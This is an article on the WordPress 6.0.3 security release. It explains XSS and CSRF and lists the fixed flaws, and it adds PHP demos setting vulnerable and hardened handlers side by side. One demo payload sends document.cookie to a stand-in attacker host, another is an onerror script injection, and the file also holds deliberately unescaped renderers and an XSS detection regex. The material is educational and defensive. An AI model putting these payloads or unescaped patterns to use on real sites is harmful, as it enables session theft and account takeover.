WordPress has released a security update that addresses more than a dozen vulnerabilities of varying severity.
WordPress 6.0.3 is a security release that fixes multiple vulnerabilities present in WordPress versions prior to 6.0.3; the fixes have also been backported to every supported branch since WordPress 3.7.
Cross-Site Scripting (XSS) Vulnerabilities
The United States government's National Vulnerability Database (NVD) has published entries for several of the vulnerabilities fixed in this release.
A number of them fall into the class known as Cross-Site Scripting, abbreviated XSS.
A cross-site scripting vulnerability occurs when a web application such as WordPress takes untrusted input (a form field, a URL parameter, an uploaded file's name or metadata) and writes it into a page without properly sanitising or escaping it, so the browser interprets the input as HTML or JavaScript rather than as text.
In the reflected form, the attacker crafts a link that carries the malicious script and persuades a user to open it; the site echoes the script back in its response and the victim's browser executes it in the site's origin, which can hand the attacker the victim's session cookies or authentication tokens, or let the attacker perform actions as that user.
Another class of flaw fixed in this release is Stored XSS, which is generally considered more serious than reflected XSS.
In a stored XSS attack the malicious script is saved on the site itself (for example in a comment, a widget, or a post body) and executes in the browser of every visitor who views the affected page, including logged-in users and administrators, without the attacker having to deliver a link to each victim.
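The following is an added example, not code from WordPress or from the advisory. It shows both variants described above in a minimal PHP renderer: a reflected case (a search term echoed back into the page) and a stored case (a comment body read from storage), each beside its escaped counterpart. The query string, the comment rows and the `has_executable_markup()` check are constructed for the demonstration; `htmlspecialchars()` stands in for WordPress's `esc_html()`.

```php
<?php
declare(strict_types=1);

// Added example: reflected and stored XSS in a minimal renderer, with the
// escaped versions alongside. Not WordPress code; all inputs are constructed.
// Run with: php xss_demo.php

// Escape at the point of output. htmlspecialchars() with ENT_QUOTES is the
// plain-PHP equivalent of WordPress's esc_html()/esc_attr().
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Reflected XSS: the query parameter goes straight back into the HTML.
function search_header_vulnerable(string $query): string
{
    return "<h2>Results for: $query</h2>";
}

function search_header_safe(string $query): string
{
    return '<h2>Results for: ' . esc($query) . '</h2>';
}

// Stored XSS: the payload was saved earlier (here, as a comment) and is
// rendered for every visitor, including logged-in administrators.
function render_comments_vulnerable(array $comments): string
{
    $out = '<ul>';
    foreach ($comments as $c) {
        $out .= '<li><b>' . $c['author'] . '</b>: ' . $c['body'] . '</li>';
    }
    return $out . '</ul>';
}

function render_comments_safe(array $comments): string
{
    $out = '<ul>';
    foreach ($comments as $c) {
        $out .= '<li><b>' . esc($c['author']) . '</b>: ' . esc($c['body']) . '</li>';
    }
    return $out . '</ul>';
}

// Rough indicator for the demo only: a raw <script tag or a tag carrying an
// on*= handler in the output means the browser would run attacker code.
// Escaped output contains no raw "<", so it never matches.
function has_executable_markup(string $html): bool
{
    return (bool) preg_match('/<script\b|<[a-z][^>]*\bon\w+\s*=/i', $html);
}

// Constructed inputs: a reflected payload in the search query and a
// comment table in which one row is the attacker's stored payload.
$query    = '<img src=x onerror="alert(document.domain)">';
$comments = [
    ['author' => 'alice',    'body' => 'Nice post & thanks!'],
    ['author' => 'attacker', 'body' => '<script>new Image().src="https://attacker.invalid/?c="+encodeURIComponent(document.cookie)</script>'],
];

foreach ([
    'reflected, vulnerable' => search_header_vulnerable($query),
    'reflected, escaped'    => search_header_safe($query),
    'stored, vulnerable'    => render_comments_vulnerable($comments),
    'stored, escaped'       => render_comments_safe($comments),
] as $label => $html) {
    printf("%-22s executes=%s\n  %s\n", $label, has_executable_markup($html) ? 'yes' : 'no', $html);
}
```

The two "vulnerable" outputs contain the payloads verbatim; the two "escaped" outputs render them as visible text. Where a field is allowed to carry limited HTML, as WordPress comments are, escaping everything is too strict and an allow-list filter such as WordPress's `wp_kses()` is the right tool; the rule that does not change is that untrusted data is encoded or filtered at the point where it is written into the page, not only when it is stored.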
The third type of discovered vulnerability is known as a Cross-Site Request Forgery (CSRF).
This type of vulnerability is described on the non-profit Open Web Application Security Project (OWASP) security website:
“Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated end user to perform unwanted actions on a web application.”
An attacker can trick users of a web application into performing actions of the attacker’s choosing with the help of social engineering (such as sending a link via email or chat).
A successful CSRF attack can force a normal user to perform state-changing requests such as transferring funds, changing their email address, and so on.
CSRF can compromise the entire web application if the victim is an administrative account.”
These are the vulnerabilities discovered:
- Stored XSS via wp-mail.php (post by email)
- Open redirect in `wp_nonce_ays`
- Sender’s email address is exposed in wp-mail.php
- Media Library – Reflected XSS via SQLi
- Cross-Site Request Forgery (CSRF) in wp-trackback.php
- Stored XSS via the Customizer
- Revert shared user instances introduced in 50790
- Stored XSS in WordPress Core via Comment Editing
- Data exposure via the REST Terms/Tags Endpoint
- Content from multipart emails leaked
- SQL Injection due to improper sanitization in `WP_Date_Query`
- RSS Widget: Stored XSS issue
- Stored XSS in the search block
- Feature Image Block: XSS issue
- RSS Block: Stored XSS issue
- Fix widget block XSS
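To make the OWASP description of CSRF quoted above concrete, and to show the kind of check a state-changing endpoint such as the one behind wp-trackback.php needs, here is an added example in plain PHP. It is not WordPress's own code and says nothing about the specific trackback flaw: it models the nonce scheme WordPress uses (`wp_create_nonce()`/`wp_verify_nonce()`: an HMAC over the action, the user and a coarse time tick, checked with a constant-time compare) and applies it to a constructed handler. `NONCE_SECRET`, the handler functions and the request arrays are all assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example: a CSRF-vulnerable state-changing handler next to one
// protected by a WordPress-style nonce. Not WordPress code; the secret,
// the handler and the requests are constructed. Run with: php csrf_demo.php

const NONCE_SECRET = 'replace-with-a-random-per-site-secret'; // assumption: loaded from config
const NONCE_LIFE   = 24 * 60 * 60;                            // WordPress's default nonce lifetime

// Nonces are minted per half-life window; the current and the previous
// window are both accepted, so a form left open for a while still submits.
function nonce_tick(int $now): int
{
    return (int) ceil($now / (NONCE_LIFE / 2));
}

function nonce_for_tick(int $tick, string $action, int $user_id): string
{
    return substr(hash_hmac('sha256', "$tick|$action|$user_id", NONCE_SECRET), -12, 10);
}

function create_nonce(string $action, int $user_id, int $now): string
{
    return nonce_for_tick(nonce_tick($now), $action, $user_id);
}

function verify_nonce(string $nonce, string $action, int $user_id, int $now): bool
{
    $tick = nonce_tick($now);
    foreach ([$tick, $tick - 1] as $t) {
        if (hash_equals(nonce_for_tick($t, $action, $user_id), $nonce)) {
            return true;
        }
    }
    return false;
}

// Vulnerable handler: trusts the session cookie alone, so a POST forged from
// an attacker's page is indistinguishable from one the user meant to send.
function record_trackback_vulnerable(array $request, array &$trackbacks): string
{
    $trackbacks[] = (int) $request['post_id'];
    return 'recorded';
}

// Hardened handler: the request must carry a nonce bound to this action and
// this user. An attacker's page cannot read the victim's nonce (same-origin
// policy) and cannot forge one without NONCE_SECRET.
function record_trackback_safe(array $request, int $user_id, int $now, array &$trackbacks): string
{
    $post_id = (int) ($request['post_id'] ?? 0);
    $nonce   = (string) ($request['_wpnonce'] ?? '');
    if (!verify_nonce($nonce, "trackback-$post_id", $user_id, $now)) {
        return 'rejected: bad or missing nonce';
    }
    $trackbacks[] = $post_id;
    return 'recorded';
}

$now    = time();
$victim = 7;      // user id of the logged-in victim
$store  = [];

// Cross-site POST: the browser attaches the victim's cookies and nothing more.
$forged = ['post_id' => 42];
echo 'vulnerable, forged request:     ', record_trackback_vulnerable($forged, $store), PHP_EOL;
echo 'hardened, forged request:       ', record_trackback_safe($forged, $victim, $now, $store), PHP_EOL;

// A form the site rendered for this user embeds a matching nonce.
$legit = ['post_id' => 42, '_wpnonce' => create_nonce('trackback-42', $victim, $now)];
echo 'hardened, legitimate request:   ', record_trackback_safe($legit, $victim, $now, $store), PHP_EOL;

// A nonce the attacker minted for their own account (user 8) does not transfer.
$replayed = ['post_id' => 42, '_wpnonce' => create_nonce('trackback-42', 8, $now)];
echo "hardened, attacker's own nonce: ", record_trackback_safe($replayed, $victim, $now, $store), PHP_EOL;

// A nonce from more than two windows ago is rejected as expired.
$stale = ['post_id' => 42, '_wpnonce' => create_nonce('trackback-42', $victim, $now - NONCE_LIFE - 1)];
echo 'hardened, expired nonce:        ', record_trackback_safe($stale, $victim, $now, $store), PHP_EOL;
```

In WordPress itself the equivalent is `wp_nonce_field()` in the form and `check_admin_referer()` or `wp_verify_nonce()` in the handler; the binding to the user id is what stops an attacker from harvesting a nonce with their own account and replaying it against a victim. Note that WordPress nonces are reusable within their lifetime rather than single-use, so they defend against cross-site forgery, not against replay by someone who already holds the token; setting the session cookie with `SameSite` and checking the `Origin` header are cheap additional layers.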
WordPress advised all users to immediately update their websites.
According to the official WordPress announcement:
“Several security fixes are included in this release. Because this is a security release, you should update your sites right away.
All WordPress versions since 3.7 have also been updated.”
The official WordPress announcement can be found here:
Examine the entries in the National Vulnerability Database for the following vulnerabilities: